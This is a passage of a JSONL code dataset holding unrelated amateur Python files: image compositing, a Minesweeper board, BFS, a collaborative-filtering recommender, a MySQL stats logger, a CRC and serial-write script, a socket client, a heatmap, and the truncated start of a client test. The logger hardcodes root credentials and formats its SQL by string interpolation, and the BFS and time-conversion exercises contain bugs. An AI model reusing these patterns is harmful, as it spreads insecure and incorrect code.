short_side_size):\n (w, h) = img.size\n short_side = min(w,h)\n scale = short_side_size/short_side\n dim = (int(w*scale),int(h*scale))\n return img.resize(dim)\n\n\ndef genmask(foreground, background, cor, name):\n mask = Image.new('L', background.size)\n fg = np.array(foreground)\n alpha = Image.fromarray(fg[:,:,3])\n # print(foreground.size)\n # print(fg.shape)\n # cv2.imwrite('tmp.png', fg)\n # fg = foreground.convert('L')\n mask.paste(alpha, cor, alpha)\n mask.save('./pasted_img/mask/pm_'+name+'.png')\n # cv2.imwrite('./pasted_img/mask/pm_'+name+'.png', mask)\n # #\n\ndef main():\n f_short_side_size = 600\n b_short_side_size = 900\n\n fg_list = os.listdir('./fgimgs')\n bg_list = os.listdir('./bgimgs')\n\n for fg in fg_list:\n if fg.endswith('.png'):\n randx = np.random.randint(-50,50)\n randy = np.random.randint(-50,50)\n foreground = Image.open('./fgimgs/'+fg)\n fg_name = fg.split('.')[0]\n\n bg = bg_list[np.random.randint(len(bg_list))]\n\n if bg.endswith('.jpg'):\n #angle = [0, 90, 180, 270][np.random.randint(0, 4)]\n #foreground = foreground.rotate(angle)\n bg_name = bg.split('.')[0]\n background = Image.open('./bgimgs/'+bg)\n\n background = rescale(background,b_short_side_size)\n foreground = rescale(foreground,f_short_side_size)\n print('----background---', background.size)\n print('----foreground---', foreground.size)\n\n b_center = (background.size[0]//2,background.size[1]//2)\n f_center = (foreground.size[0]//2,foreground.size[1]//2)\n f_left = (b_center[0]-f_center[0]+randx,b_center[1]-f_center[1]+randy)\n\n background.paste(foreground,f_left,foreground)\n background.save('./pasted_img/img/p_'+fg_name+'_'+bg_name+'.jpg')\n\n genmask(foreground,background,f_left,fg_name+'_'+bg_name)\n\n\nif __name__ =='__main__':\n main()\n","sub_path":"gendata/gendata.py","file_name":"gendata.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"385194434","text":"from random import *\n\n\nclass Layout():\n def __init__(self, game_settings=None):\n \"\"\" 初始化布局格子的设置 \"\"\"\n if game_settings:\n # 数组宽高 后期可改\n self.width = game_settings.cell_column_number\n self.height = game_settings.cell_row_number\n # 设置地雷个数 后期可改 封装函数\n self.mine_num = game_settings.mine_num\n else: # 主要用于单元测试\n self.width = 8\n self.height = 8\n self.mine_num = 5\n # 二维数组用于存储每个格子周围有多少个地雷 初始化为零\n self.mine_array = [[0 for i in range(self.width)] for i in range(self.height)]\n # 计算途中用于已打开的提示格子\n self.tips = []\n\n def reset_array(self):\n # 数组初始化\n self.mine_array = [[0 for i in range(self.width)] for i in range(self.height)]\n\n def get_random_position(self):\n \"\"\"\n 随机获取放置炸弹的位置\n :return: (i, j)元组组合的potions(list)\n (已测试181220)\n \"\"\"\n mine_left = self.mine_num\n # 用于存储每列埋了多少地雷\n column_mine_num = []\n for i in range(self.width-1):\n if mine_left > self.height:\n mine_num = randint(0, self.height//3*2)\n else:\n mine_num = randint(0, mine_left//2)\n mine_left -= mine_num\n column_mine_num.append(mine_num)\n if mine_left == 0:\n break\n if mine_left != 0:\n if mine_left > self.height: # 如果剩下的地雷大于最后一列的行数需要重新set\n self.set_mine()\n else:\n column_mine_num.append(mine_left)\n # print(\"column_mine_num: \")\n # print(column_mine_num)\n # postions用于记录元组(i, j)位置放置的炸弹\n j = 0\n positions = []\n for mine_num in column_mine_num:\n rows = sample(range(self.height), mine_num)\n # print(\"row: \")\n # print(rows)\n for row in rows:\n positions.append((row, j))\n j += 1\n return positions\n\n def set_mine(self):\n \"\"\"\n 设置炸弹位置并更新炸弹周围格子的number\n (已测试181220)\n \"\"\"\n position = self.get_random_position()\n for (i, j) in position:\n # 更新炸弹及其周围各自的数值\n # 炸弹所占格子 >= 9\n self.mine_array[i][j] = 9\n if i > 0:\n self.mine_array[i-1][j] += 1\n if j > 0:\n self.mine_array[i-1][j-1] += 1\n if j < self.width - 1:\n self.mine_array[i - 1][j + 1] += 1\n if j > 0:\n self.mine_array[i][j-1] += 1\n if i < self.height -1:\n self.mine_array[i+1][j] += 1\n if j < self.width - 1:\n self.mine_array[i + 1][j + 1] += 1\n if j > 0:\n self.mine_array[i + 1][j - 1] += 1\n if j < self.width - 1:\n self.mine_array[i][j+1] += 1\n\n def input_update_array(self, i, j):\n \"\"\"\n 用户选择(i,j)位置,如果该位置是地雷则游戏失败\n 是无意义位置则打开周围的格子\n tips用于记录本次要打开的提示格子\n :return: stat of game(boolean)\n (已测试tips/mine_array 181220)\n \"\"\"\n if self.mine_array[i][j] >= 9:\n # 用户踩到地雷\n return False\n if self.mine_array[i][j] == 0:\n # 用户踩到无意义砖块将砖块周围的无意义砖块全变为-1表示打开\n self.mine_array[i][j] = -1\n waited = [(i, j)]\n while len(waited) > 0:\n # waited记录还没有遍历周围的格子位置(只需要记录上下左右)\n # tips用于记录需要打开的提示格子位置(需要记录���能的8个方向)\n (i, j) = waited.pop()\n if i > 0:\n # print(i, j)\n if self.mine_array[i-1][j] == 0: # 上\n self.mine_array[i-1][j] = -1\n waited.append((i-1, j))\n # 将周围的提示格子加入(上、上左、上右方向)\n elif 0 < self.mine_array[i-1][j] < 9 and (i-1, j) not in self.tips: # 上\n self.tips.append((i-1, j))\n if j > 0 and 0 < self.mine_array[i-1][j-1] < 9 and (i-1, j-1) not in self.tips: # 上左\n self.tips.append((i-1, j-1))\n if j < self.width - 1 and 0 < self.mine_array[i-1][j+1] < 9 and (i-1, j+1) not in self.tips: # 上右\n self.tips.append((i-1, j+1))\n if j > 0:\n if self.mine_array[i][j-1] == 0: # 左\n self.mine_array[i][j-1] = -1\n waited.append((i, j-1))\n # 将周围的提示格子加入(左方向)\n elif 0 < self.mine_array[i][j-1] < 9 and (i, j-1) not in self.tips:\n self.tips.append((i, j-1))\n if i < self.height - 1:\n if self.mine_array[i+1][j] == 0: # 下\n self.mine_array[i+1][j] = -1\n waited.append((i+1, j))\n # 将周围的提示格子加入(下、下左、下右方向)\n elif 0 < self.mine_array[i+1][j] < 9 and (i+1, j) not in self.tips:\n self.tips.append((i+1, j))\n if j < self.width - 1 and 0 < self.mine_array[i+1][j+1] < 9 and (i+1, j+1) not in self.tips:# 下右\n self.tips.append((i+1, j+1))\n if j > 0 and 0 < self.mine_array[i+1][j-1] < 9 and (i+1, j-1) not in self.tips:# 下左\n self.tips.append((i+1, j-1))\n if j < self.width - 1:\n if self.mine_array[i][j+1] == 0: # 右\n self.mine_array[i][j+1] = -1\n waited.append((i, j+1))\n # 将周围的提示格子加入(右方向)\n if 0 < self.mine_array[i][j+1] < 9 and (i, j+1) not in self.tips:\n self.tips.append((i, j+1))\n else:\n self.tips.append((i, j))\n self.tips.sort()\n return True\n\n\n# if __name__ == \"__main__\":\n# layout = Layout()\n# layout.set_mine()\n# print(layout.mine_num)\n# for row in layout.mine_array:\n# print(row)\n# layout.get_input_position(2,3)\n# print(\"after\")\n# for row in layout.mine_array:\n# print(row)\n","sub_path":"module/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":6828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"310854868","text":"from AdjListGraph import Graph\nfrom AdjListGraph import Vertex\n\nG = Graph(True)\nG.addVertex('a')\nG.addVertex('b')\nG.addVertex('c')\nG.addVertex('d')\nG.addVertex('e')\nG.addVertex('f')\nG.addEdge('a', 'b', 1) \nG.addEdge('a', 'c', 1)\nG.addEdge('b', 'd', 1)\nG.addEdge('b', 'e', 1)\nG.addEdge('c', 'd', 1)\nG.addEdge('c', 'e', 1)\nG.addEdge('d', 'e', 1)\nG.addEdge('e', 'a', 1)\nG.addEdge('a', 'f', 1)\nprint (G.getEdges())\nfor k in G.getEdges():\n print(k)\n\n\nfrom collections import deque\n\ndef bfs(G, start, dest):\n queue = deque() # vertex\n visited = set() # vertex id\n parent = {} # vertex id\n queue.append(start)\n while len(queue) != 0:\n curr = queue.popleft() # vertex\n print(\"visiting \", curr.getVertexID())\n if (curr.getVertexID() == dest.getVertexID()):\n return parent\n neighbors = G.getNeighbors(curr.getVertexID())\n for n in neighbors:\n id = n.getVertexID()\n visited.add(id)\n parent[id] = curr.getVertexID()\n queue.append(n)\n return None\n\nstart = G.getVertex('a')\ndest = G.getVertex('e')\nparent = bfs(G, start, dest)\nprint(parent)","sub_path":"Python Algrothm Advanced/practice/170401BFS.py","file_name":"170401BFS.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"99353342","text":"import pandas as pd\nimport numpy as np\nimport scipy as sp\nimport scipy.sparse as sps\nfrom scipy.sparse import hstack\nimport time, sys\nfrom old_stuff.new_utils import utils\n\ndef check_matrix(X, format='csc', dtype=np.float32):\n if format == 'csc' and not isinstance(X, sps.csc_matrix):\n return X.tocsc().astype(dtype)\n elif format == 'csr' and not isinstance(X, sps.csr_matrix):\n return X.tocsr().astype(dtype)\n elif format == 'coo' and not isinstance(X, sps.coo_matrix):\n return X.tocoo().astype(dtype)\n elif format == 'dok' and not isinstance(X, sps.dok_matrix):\n return X.todok().astype(dtype)\n elif format == 'bsr' and not isinstance(X, sps.bsr_matrix):\n return X.tobsr().astype(dtype)\n elif format == 'dia' and not isinstance(X, sps.dia_matrix):\n return X.todia().astype(dtype)\n elif format == 'lil' and not isinstance(X, sps.lil_matrix):\n return X.tolil().astype(dtype)\n else:\n return X.astype(dtype)\n\nclass Cosine_Similarity:\n\n\n def __init__(self, dataMatrix, topK=100, shrink = 0, normalize = True,\n mode = \"cosine\"):\n \"\"\"\n Computes the cosine similarity on the columns of dataMatrix\n If it is computed on URM=|users|x|items|, pass the URM as is.\n If it is computed on ICM=|items|x|features|, pass the ICM transposed.\n :param dataMatrix:\n :param topK:\n :param shrink:\n :param normalize:\n :param mode: \"cosine\" computes Cosine similarity\n \"adjusted\" computes Adjusted Cosine, removing the average of the users\n \"pearson\" computes Pearson Correlation, removing the average of the items\n \"jaccard\" computes Jaccard similarity for binary interactions using Tanimoto\n \"tanimoto\" computes Tanimoto coefficient for binary interactions\n\n \"\"\"\n\n super(Cosine_Similarity, self).__init__()\n\n self.TopK = topK\n self.shrink = shrink\n self.normalize = normalize\n self.n_columns = dataMatrix.shape[1]\n self.n_rows = dataMatrix.shape[0]\n\n self.dataMatrix = dataMatrix.copy()\n\n self.adjusted_cosine = False\n self.pearson_correlation = False\n self.tanimoto_coefficient = False\n\n if mode == \"adjusted\":\n self.adjusted_cosine = True\n elif mode == \"pearson\":\n self.pearson_correlation = True\n elif mode == \"jaccard\" or mode == \"tanimoto\":\n self.tanimoto_coefficient = True\n # Tanimoto has a specific kind of normalization\n self.normalize = False\n\n elif mode == \"cosine\":\n pass\n else:\n raise ValueError(\"Cosine_Similarity: value for paramether 'mode' not recognized.\"\n \" Allowed values are: 'cosine', 'pearson', 'adjusted', 'jaccard', 'tanimoto'.\"\n \" Passed value was '{}'\".format(mode))\n\n\n\n if self.TopK == 0:\n self.W_dense = np.zeros((self.n_columns, self.n_columns))\n\n\n\n\n def applyAdjustedCosine(self):\n \"\"\"\n Remove from every data point the average for the corresponding row\n :return:\n \"\"\"\n\n self.dataMatrix = check_matrix(self.dataMatrix, 'csr')\n\n\n interactionsPerRow = np.diff(self.dataMatrix.indptr)\n\n nonzeroRows = interactionsPerRow > 0\n sumPerRow = np.asarray(self.dataMatrix.sum(axis=1)).ravel()\n\n rowAverage = np.zeros_like(sumPerRow)\n rowAverage[nonzeroRows] = sumPerRow[nonzeroRows] / interactionsPerRow[nonzeroRows]\n\n\n # Split in blocks to avoid duplicating the whole data structure\n start_row = 0\n end_row= 0\n\n blockSize = 1000\n\n\n while end_row < self.n_rows:\n\n end_row = min(self.n_rows, end_row + blockSize)\n\n self.dataMatrix.data[self.dataMatrix.indptr[start_row]:self.dataMatrix.indptr[end_row]] -= \\\n np.repeat(rowAverage[start_row:end_row], interactionsPerRow[start_row:end_row])\n\n start_row += blockSize\n\n\n\n\n def applyPearsonCorrelation(self):\n \"\"\"\n Remove from every data point the average for the corresponding column\n :return:\n \"\"\"\n\n self.dataMatrix = check_matrix(self.dataMatrix, 'csc')\n\n\n interactionsPerCol = np.diff(self.dataMatrix.indptr)\n\n nonzeroCols = interactionsPerCol > 0\n sumPerCol = np.asarray(self.dataMatrix.sum(axis=0)).ravel()\n\n colAverage = np.zeros_like(sumPerCol)\n colAverage[nonzeroCols] = sumPerCol[nonzeroCols] / interactionsPerCol[nonzeroCols]\n\n\n # Split in blocks to avoid duplicating the whole data structure\n start_col = 0\n end_col= 0\n\n blockSize = 1000\n\n\n while end_col < self.n_columns:\n\n end_col = min(self.n_columns, end_col + blockSize)\n\n self.dataMatrix.data[self.dataMatrix.indptr[start_col]:self.dataMatrix.indptr[end_col]] -= \\\n np.repeat(colAverage[start_col:end_col], interactionsPerCol[start_col:end_col])\n\n start_col += blockSize\n\n\n def useOnlyBooleanInteractions(self):\n\n # Split in blocks to avoid duplicating the whole data structure\n start_pos = 0\n end_pos= 0\n\n blockSize = 1000\n\n\n while end_pos < len(self.dataMatrix.data):\n\n end_pos = min(len(self.dataMatrix.data), end_pos + blockSize)\n\n self.dataMatrix.data[start_pos:end_pos] = np.ones(end_pos-start_pos)\n\n start_pos += blockSize\n\n\n\n\n def compute_similarity(self):\n\n values = []\n rows = []\n cols = []\n\n start_time = time.time()\n start_time_print_batch = start_time\n processedItems = 0\n\n if self.adjusted_cosine:\n self.applyAdjustedCosine()\n\n elif self.pearson_correlation:\n self.applyPearsonCorrelation()\n\n elif self.tanimoto_coefficient:\n self.useOnlyBooleanInteractions()\n\n\n # We explore the matrix column-wise\n self.dataMatrix = check_matrix(self.dataMatrix, 'csc')\n\n\n # Compute sum of squared values to be used in normalization\n sumOfSquared = np.array(self.dataMatrix.power(2).sum(axis=0)).ravel()\n\n # Tanimoto does not require the square root to be applied\n if not self.tanimoto_coefficient:\n sumOfSquared = np.sqrt(sumOfSquared)\n\n\n # Compute all similarities for each item using vectorization\n for columnIndex in range(self.n_columns):\n\n processedItems += 1\n\n if time.time() - start_time_print_batch >= 30 or processedItems==self.n_columns:\n columnPerSec = processedItems / (time.time() - start_time)\n\n print(\"Similarity column {} ( {:2.0f} % ), {:.2f} column/sec, elapsed time {:.2f} secs\".format(\n processedItems, processedItems / self.n_columns * 100, columnPerSec, (time.time() - start_time)))\n\n sys.stdout.flush()\n sys.stderr.flush()\n\n start_time_print_batch = time.time()\n\n\n # All data points for a given item\n item_data = self.dataMatrix[:, columnIndex]\n item_data = item_data.toarray().squeeze()\n\n # Compute item similarities\n this_column_weights = self.dataMatrix.T.dot(item_data)\n this_column_weights[columnIndex] = 0.0\n\n # Apply normalization and shrinkage, ensure denominator != 0\n if self.normalize:\n denominator = sumOfSquared[columnIndex] * sumOfSquared + self.shrink + 1e-6\n this_column_weights = np.multiply(this_column_weights, 1 / denominator)\n\n # Apply the specific denominator for Tanimoto\n elif self.tanimoto_coefficient:\n denominator = sumOfSquared[columnIndex] + sumOfSquared - this_column_weights + self.shrink + 1e-6\n this_column_weights = np.multiply(this_column_weights, 1 / denominator)\n\n # If no normalization or tanimoto is selected, apply only shrink\n elif self.shrink != 0:\n this_column_weights = this_column_weights/self.shrink\n\n\n if self.TopK == 0:\n self.W_dense[:, columnIndex] = this_column_weights\n\n else:\n # Sort indices and select TopK\n # Sorting is done in three steps. Faster then plain np.argsort for higher number of items\n # - Partition the data to extract the set of relevant items\n # - Sort only the relevant items\n # - Get the original item index\n relevant_items_partition = (-this_column_weights).argpartition(self.TopK-1)[0:self.TopK]\n relevant_items_partition_sorting = np.argsort(-this_column_weights[relevant_items_partition])\n top_k_idx = relevant_items_partition[relevant_items_partition_sorting]\n\n # Incrementally build sparse matrix\n values.extend(this_column_weights[top_k_idx])\n rows.extend(top_k_idx)\n cols.extend(np.ones(self.TopK) * columnIndex)\n\n if self.TopK == 0:\n return self.W_dense\n\n else:\n\n W_sparse = sps.csr_matrix((values, (rows, cols)),\n shape=(self.n_columns, self.n_columns),\n dtype=np.float32)\n\n\n return W_sparse\n\nclass User_CFKNNRecSys():\n\n def __init__(self, URM_train, k=100, shrink=0):\n self._URM_train = URM_train.tocsr()\n self._k = k\n self._shrink = shrink\n\n def fit(self):\n self._similarity_matrix = Cosine_Similarity(self._URM_train.T, self._k, self._shrink, normalize=False, mode='cosine').compute_similarity()\n\n def recommend(self, user_id, at=None, exclude_seen=True):\n # compute the scores using the dot product\n scores = self._similarity_matrix[user_id].dot(self._URM_train).toarray().ravel()\n\n if exclude_seen:\n scores = self.filter_seen(user_id, scores)\n\n # rank items\n ranking = scores.argsort()[::-1]\n\n return ranking[:at]\n\n def filter_seen(self, user_id, scores):\n\n start_pos = int(self._URM_train.indptr[user_id])\n end_pos = int(self._URM_train.indptr[user_id + 1])\n\n user_profile = self._URM_train.indices[start_pos:end_pos]\n\n scores[user_profile] = -np.inf\n\n return scores\n\n def recommendALL(self, userList, at=10):\n res = np.array([])\n n=0\n for i in userList:\n n+=1\n recList = self.recommend(i, at)\n tuple = np.concatenate((i, recList))\n if (res.size == 0):\n res = tuple\n else:\n res = np.vstack([res, tuple])\n return res\n\nclass Item_CFKNNRecSys():\n\n def __init__(self, URM_train, k=100, shrink=0):\n self._URM_train = URM_train.tocsr()\n self._k = k\n self._shrink = shrink\n\n def fit(self):\n self._similarity_matrix = Cosine_Similarity(self._URM_train.tocsc(), self._k, self._shrink, normalize=False, mode='cosine').compute_similarity()\n\n def recommend(self, user_id, at=None, exclude_seen=True):\n # compute the scores using the dot product\n user_profile = self._URM_train[user_id]\n scores = user_profile.dot(self._similarity_matrix).toarray().ravel()\n\n if exclude_seen:\n scores = self.filter_seen(user_id, scores)\n\n # rank items\n ranking = scores.argsort()[::-1]\n\n return ranking[:at]\n\n def filter_seen(self, user_id, scores):\n\n start_pos = int(self._URM_train.indptr[user_id])\n end_pos = int(self._URM_train.indptr[user_id + 1])\n\n user_profile = self._URM_train.indices[start_pos:end_pos]\n\n scores[user_profile] = -np.inf\n\n return scores\n\n def recommendALL(self, userList, at=10):\n res = np.array([])\n n=0\n for i in userList:\n n+=1\n recList = self.recommend(i, at)\n tuple = np.concatenate((i, recList))\n if (res.size == 0):\n res = tuple\n else:\n res = np.vstack([res, tuple])\n return res\n\nclass ensemble_CFKNNRecSys():\n def __init__(self, URM_train, k=100, alpha=0.07809/(0.07809+0.08188) , beta=0.08188/(0.07809+0.08188), shrink=0):\n self._URM_train = URM_train.tocsr()\n self._k = k\n self._shrink = shrink\n\n self.UUSCORE = alpha\n\n self.IISCORE = beta\n\n def fit(self):\n self._similarity_matrixUU = Cosine_Similarity(self._URM_train.T, self._k, self._shrink, normalize=True, mode='cosine').compute_similarity()\n self._similarity_matrixII = Cosine_Similarity(self._URM_train.tocsc(), self._k, self._shrink, normalize=True, mode='cosine').compute_similarity()\n\n def recommend(self, user_id, at=None, exclude_seen=True):\n # compute the scores using the dot product\n user_profile = self._URM_train[user_id]\n scores = (self.IISCORE*user_profile.dot(self._similarity_matrixII).toarray() +\n self.UUSCORE*self._similarity_matrixUU[user_id].dot(self._URM_train).toarray() ).ravel()\n\n if exclude_seen:\n scores = self.filter_seen(user_id, scores)\n\n # rank items\n ranking = scores.argsort()[::-1]\n\n return ranking[:at]\n\n def filter_seen(self, user_id, scores):\n\n start_pos = int(self._URM_train.indptr[user_id])\n end_pos = int(self._URM_train.indptr[user_id + 1])\n\n user_profile = self._URM_train.indices[start_pos:end_pos]\n\n scores[user_profile] = -np.inf\n\n return scores\n\n def recommendALL(self, userList, at=10):\n res = np.array([])\n n=0\n for i in userList:\n n+=1\n recList = self.recommend(i, at)\n tuple = np.concatenate((i, recList))\n if (res.size == 0):\n res = tuple\n else:\n res = np.vstack([res, tuple])\n return res\n\n\ndef xvalidation_par(elements=1500, folds=10):\n maps = []\n alphas = []\n for i in range(0, elements):\n alpha = np.random.uniform(0, 1)\n data = []\n for j in range(0, folds):\n beta = 1 - alpha\n res = main(alpha, beta)\n map = res[\"MAP\"]\n data.append(map)\n data_array = np.array(data)\n mean = np.average(data_array)\n alphas.append(alpha)\n maps.append(mean)\n print('\\n \\n_____________________________________')\n print('finished iteration {0} with a = {1}'.format(i, alpha))\n print('_____________________________________\\n \\n')\n\n d = {\"alpha\" : alphas, \"map\" : maps}\n df = pd.DataFrame(data=d, index=None)\n df.to_csv(\"../../results/evaluation/data_ensembleCF.csv\", index=None)\n\ndef main(alpha, beta):\n URM_text = np.loadtxt('../../data/train.csv', delimiter=',', dtype=int, skiprows=1)\n user_list, item_list = zip(*URM_text)\n rating_list = np.ones(len(user_list))\n URM = sps.csr_matrix((rating_list, (user_list, item_list)))\n\n URM_train, URM_test = utils.train_test_holdout(URM, 0.8)\n\n cf = ensemble_CFKNNRecSys(URM_train, 50, alpha, beta,)\n cf.fit()\n\n target = pd.read_csv('../../data/target_playlists.csv', index_col=False)\n recommended = cf.recommendALL(target.values)\n\n playlists = recommended[:, 0]\n recommended = np.delete(recommended, 0, 1)\n i = 0\n res_fin = []\n for j in recommended:\n res = ''\n for k in range(0, len(j)):\n res = res + '{0} '.format(j[k])\n res_fin.append(res)\n i = i + 1\n d = {'playlist_id': playlists, 'track_ids': res_fin}\n df = pd.DataFrame(data=d, index=None)\n df.to_csv(\"../../results/recommendedCFtest_test_recommend_all.csv\", index=None)\n\n return utils.evaluate_csv(URM_test, \"../../results/recommendedCFtest_test_recommend_all.csv\")\n\nif __name__ == '__main__':\n xvalidation_par(1500, 10)\n","sub_path":"old_stuff/kernels/ensemble_CF.py","file_name":"ensemble_CF.py","file_ext":"py","file_size_in_byte":15988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"517845727","text":"#!/usr/bin/env python3\nimport psutil\nimport sys\nimport mysql.connector\nfrom mysql.connector import Error\n\ndef connect():\n \"\"\" Connect to MySQL database \"\"\"\n try:\n conn = mysql.connector.connect(host='localhost',\n database='cl-autotest',\n user='root',\n password='root')\n if conn.is_connected():\n print('Connected to MySQL database')\n x = conn.cursor()\n print('Collect data')\n cpu_usage = psutil.cpu_percent(interval=60, percpu=False)\n disk_free = psutil.disk_usage('/home').percent\n print(cpu_usage)\n print(disk_free)\n print('Export to MySQL')\n x.execute(\"INSERT INTO `stats` (`cpu_usage`, `disk_free`) VALUES (%s, %s)\" % (cpu_usage, disk_free))\n conn.commit()\n\n except Error as errorik:\n print(errorik)\n\n\n finally:\n conn.close()\n\nif __name__ == '__main__':\n connect()","sub_path":"system/stat.py","file_name":"stat.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"546571469","text":"#!/usr/bin/python3\n\ndef compute_crc8_atm(datagram, initial_value=0):\n crc = initial_value\n # Iterate bytes in data\n for byte in datagram:\n # Iterate bits in byte\n for _ in range(0, 8):\n if (crc >> 7) ^ (byte & 0x01):\n crc = ((crc << 1) ^ 0x07) & 0xFF\n else:\n crc = (crc << 1) & 0xFF\n # Shift to next bit\n byte = byte >> 1\n return crc\n \n\ndef write_bytes(addr, reg, data):\n\tpad = 0x05\n\treg |= 0x80\n\tto_send = [pad, addr, reg]+data\n\tcrc = compute_crc8_atm(to_send)\n\tto_send += [crc]\n\treturn \"\".join(['\\\\x'+hex(byte)[2:] for byte in to_send])\n\t\t\n# Write Rsense int\nfor i in range(4):\n\tprint(\"echo -n -e \\\"\"+write_bytes(i, 0x00, [0x00, 0x00, 0x01, 0x82])+\"\\\" > /dev/ttyS2\")\n\tprint(\"echo -n -e \\\"\"+write_bytes(i, 0x00, [0x00, 0x00, 0x01, 0x82])+\"\\\" > /dev/ttyS3\")\n\n# Write Ihold\nfor i in range(4):\n\tprint(\"echo -n -e \\\"\"+write_bytes(i, 0x10, [0x00, 0x00, 0x00, 0x00])+\"\\\" > /dev/ttyS2\")\n\tprint(\"echo -n -e \\\"\"+write_bytes(i, 0x10, [0x00, 0x00, 0x00, 0x00])+\"\\\" > /dev/ttyS3\")\n\t\n# Chopconf\nfor i in range(4):\n\tprint(\"echo -n -e \\\"\"+write_bytes(i, 0x6C, [0x15, 0x00, 0x00, 0x53])+\"\\\" > /dev/ttyS2\")\n\tprint(\"echo -n -e \\\"\"+write_bytes(i, 0x6C, [0x15, 0x00, 0x00, 0x53])+\"\\\" > /dev/ttyS3\")\n\t\n\n","sub_path":"tests/test_recore/crc.py","file_name":"crc.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"397654219","text":"import socket\n\n# Инициализируем сокет\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# Подключаемся к localhost'у\nclient_socket.connect(('127.0.0.1', 5555))\n\nwhile True:\n # Ввод данных для отправки на сервер\n msg = str(input('> '))\n # Отправка данных на сервер\n client_socket.sendall(str.encode(msg))\n","sub_path":"BaseClient.py","file_name":"BaseClient.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"415933727","text":"def conversor(horas):\r\n if horas < 12:\r\n horario = 'A.M'\r\n elif horas >= 12:\r\n horario = 'P.M'\r\n \r\n if horas > 12:\r\n horas -= 12\r\n return(horas, horario)\r\n \r\ndef saida(horas, minutos):\r\n \r\n print('{}:{} {}' .format(horas, minutos, horario))\r\n\r\nentrada = input().split()\r\nhoras = int(entrada[0])\r\nminutos = int(entrada[1])\r\n\r\nsaida(conversor(horas), minutos)","sub_path":"listas/lista-05/questao06.py","file_name":"questao06.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"11283126","text":"\"\"\"Standford Code in Place 2021 - Final Project:\nCreating a heatmap visualization with seaborn \nsubmission by Adelaide Atakora\n\n\nTo run a demo of this program, ensure you have the following packages installed: pandas, seaborn, and matplotlib.\"\"\"\n\n\n# Imports the following packages\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n# Creates a heatmap from a pandas pivot table with seaborn\ndef create_heatmap(df):\n # Creates a pandas pivot table to hold the data for the heatmap\n heatmap_data = pd.pivot_table(\n df, index='continent', columns='year', values='lifeExp')\n # Prints the heatmap table as an output\n print(heatmap_data)\n\n # Creates the heatmap from the pivot table data\n sns.heatmap(heatmap_data)\n\n\n# Creates the heatmap with matlablib.pyplot\ndef plot_heatmap_image():\n # Plots the title of the heatmap\n plt.title(\"Heatmap of Life Expectancy Over the Years by Continent\")\n\n # Saves an image of the heatmap\n plt.show()\n\n\n# Calls all the relevant code pieces to be executed in main\ndef main():\n # Reads csv data from file located in the specified path\n df = pd.read_csv(\n r'https://raw.githubusercontent.com/Adela7/StanfordCodeinPlace21Project/main/LifeExpectancybyCountry.csv')\n # prints DataFrame to output\n print(df)\n\n # Calls the create_heatmap() funtion to creates a heatmap using the DataFrame above\n create_heatmap(df)\n\n # Calls the plot_heatmap_image() funtion to plot and save an image of the heatmap in project folder\n plot_heatmap_image()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"CiP21projbyAdelaideA.py","file_name":"CiP21projbyAdelaideA.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"66446226","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport ddt\nimport uuid\n\nfrom tempest_lib.cli import output_parser\nfrom tempest_lib import exceptions\n\nfrom afloclient.tests.functional import base\n\n\n@ddt.ddt\nclass ClientTestCatalogContents(base.BaseTestCase):\n \"\"\"Test catalog contents of aflo component service.\"\"\"\n\n @ddt.data('admin', 'user')\n def test_catalog_contents(self, role):\n \"\"\"Test of 'Catalog contents commands'\n Test the operation of the List, Get, Update, Delete commands result.\n :param role: running user.\n \"\"\"\n catalog_id = 'catalog0-1111-2222-3333-100000000001'\n seq_no = None\n\n # Add records\n seq_no, seq_no_dammy = \\\n self._create_catalog_contents('admin', catalog_id)\n\n # Get records by list.\n self._list_catalog_contents(role, catalog_id, seq_no)\n\n # Get records by catalog contents get.\n self._show_catalog_contents(role, catalog_id, seq_no)\n\n # Update records\n if role == 'admin':\n self._update_catalog_contents(role,\n catalog_id,\n seq_no)\n\n # Delete records\n self.clients['admin']\\\n .run_command('catalog-contents-delete',\n params=' --catalog-id %s --seq-no %s' %\n (catalog_id, seq_no))\n\n self.clients['admin']\\\n .run_command('catalog-contents-delete',\n params=' --catalog-id %s --seq-no %s' %\n ('catalog0-1111-2222-3333-100000000002',\n seq_no_dammy))\n\n self.assertRaises(exceptions.CommandFailed,\n self.clients['admin'].run_command,\n 'catalog-contents-delete',\n params=' --catalog-id %s --seq-no %s' %\n (catalog_id, seq_no))\n\n def _create_catalog_contents(self, role, catalog_id):\n \"\"\"Create catalog contents data.\n :param role: running user.\n :param catalog_id: Catalog id.\n \"\"\"\n st_create_dammy = self.clients[role].run_command(\n 'catalog-contents-create',\n params=' --catalog-id {0}'\n ' --goods-id {1}'\n ' --goods-num {2}'\n .format('catalog0-1111-2222-3333-100000000002',\n 'goods_id_dammy',\n '5678'))\n\n st_create = self.clients[role].run_command(\n 'catalog-contents-create',\n 